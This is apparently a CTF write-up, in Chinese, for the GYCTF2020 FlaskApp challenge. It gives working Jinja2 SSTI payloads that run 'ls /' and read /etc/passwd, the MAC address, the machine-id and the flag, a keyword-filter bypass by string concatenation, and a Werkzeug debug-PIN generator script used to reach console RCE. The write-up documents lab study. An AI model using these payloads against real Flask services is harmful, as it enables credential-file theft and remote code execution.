Flask PIN码生成终端RCE

来自

[GYCTF2020]FlaskApp

这道题确实不会，只能乖乖看wp做复现，但是学到了很牛逼的东西，一部分flask的SSTI注入知识和PIN码的生成机制。

点进去就是base64的加解密程序，hint处有个提示，源码里有PIN。

预期解应该是debug出pin码然后终端RCE。

非预期解

字符串拼接

这里用的是字符串拼接加SSTI注入搞定的好像。

先base64加密进去再到base64解密那里回显，本来想{{7*‘7’}}，但是TypeError了，因为int和str类型不能直接运算，但是转念一想都给你说了是flask，直接{{7+7}}测有没有注入漏洞不就完了吗。

发现回显14，能注。

这里我也不会怎么写payload，直接开学吧：https://blog.csdn.net/RABCDXB/article/details/117773638

#查看根目录
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}

返回no no no，那应该有过滤啥的。

可能被过滤了关键字符，但是我们不知道关键字符，所以要读取一下源码app.py（直接用open）

#查看app.py
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read()}}{% endif %}{% endfor %}

可以看到，ban掉了flag、os、system、popen、import、eval、chr、reque、subprocess、commands、socket、hex、base64、*、？，基本上直接RCE是行不通，反弹shell也弹不了。

但这里可以使用字符串拼接进行绕过

import = imp + ort         os =o+s，利用了python的字符串特性。

#import os
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

得到根目录文件：

发现this_is_the_flag.txt，继续进行读取，payload：

#open('/this_is_flag.txt,'r').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

爆了。

倒转输出

使用切片的形式，简单测试一下，使用[::-1]既可以倒序输出全部，这样就可以绕过过滤。

payload：

#倒着写并且在后面加一个[::-1]
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read()}}{% endif %}{% endfor %}

也爆了。

预期解

文件包含，PIN码生成。

关于PIN码的相关资料请参考：Flask debug 模式 PIN 码生成机制安全性研究笔记

得到PIN码需要六个信息：

1、flask所登录的用户名
2、modname，一般是flask.app
3、getattr(app, “name”, app.class.name)。一般为Flask
4、flask库下app.py的绝对路径。这个可以由报错信息看出
5、当前网络的mac地址的十进制数。
6、机器的id。

对于1

flask用户名可以通过读取/etc/passwd来知道

#open('/etc/passwd/')
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read() }}{% endif %}{% endfor %}

说明用户名叫flaskweb。

对于2和3

易知为flask.app和Flask

对于4

直接乱输进debug:

得到app.py路径：

/usr/local/lib/python3.7/site-packages/flask/app.py

对于5

mac地址的十进制数

首先要得到网卡 /sys/class/net/eth0/address

#open('/sys/class/net/eth0/address','r').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address','r').read() }}{% endif %}{% endfor %}

mac地址继续转化：

1）76:ef:88:de:d1:62

2）将：去掉--
76ef88ded162

3）在python中进行转化
print(int('76ef88ded162',16))
得到 130771165565282

对于6

docker机器的id，引用大佬的解释：

对于非docker机每一个机器都会有自已唯一的id，linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i，有的系统没有这两个文件。
对于docker机则读取/proc/self/cgroup，其中第一行的/docker/字符串后面的内容作为机器的id，

#open('/proc/self/cgroup','r').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/proc/self/cgroup','r').read() }}{% endif %}{% endfor %}

--这是原博客的做法，但是好像有点问题？？？因为这个不是docker了

【得到docker机器id，也就是1:name=systemd:/docker/（我这次复现是1:name=systemd:/kubepods.slice/）之后的字符串】

所以我直接读/etc/machine-id：

#open('/etc/machine-id','r').read()
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/machine-id','r').read() }}{% endif %}{% endfor %}

得到：

1408f836b0ca514d796cbf8960e45fa1

万事俱备直接上大佬脚本：

import hashlib
from itertools import chain

probably_public_bits = [
     'flaskweb'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
 ]
 
private_bits = [
     '130771165565282',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '1408f836b0ca514d796cbf8960e45fa1'# get_machine_id(), /etc/machine-id
]
 
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')
 
cookie_name = '__wzd' + h.hexdigest()[:20]
 
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]
 
rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                        for x in range(0, len(num), group_size))
            break
    else:
        rv = num
 
print(rv)

直接上/console然后RCE：

又学到了新知识，真有点大黑阔的感觉辣！！！！泰库辣！！！！！！！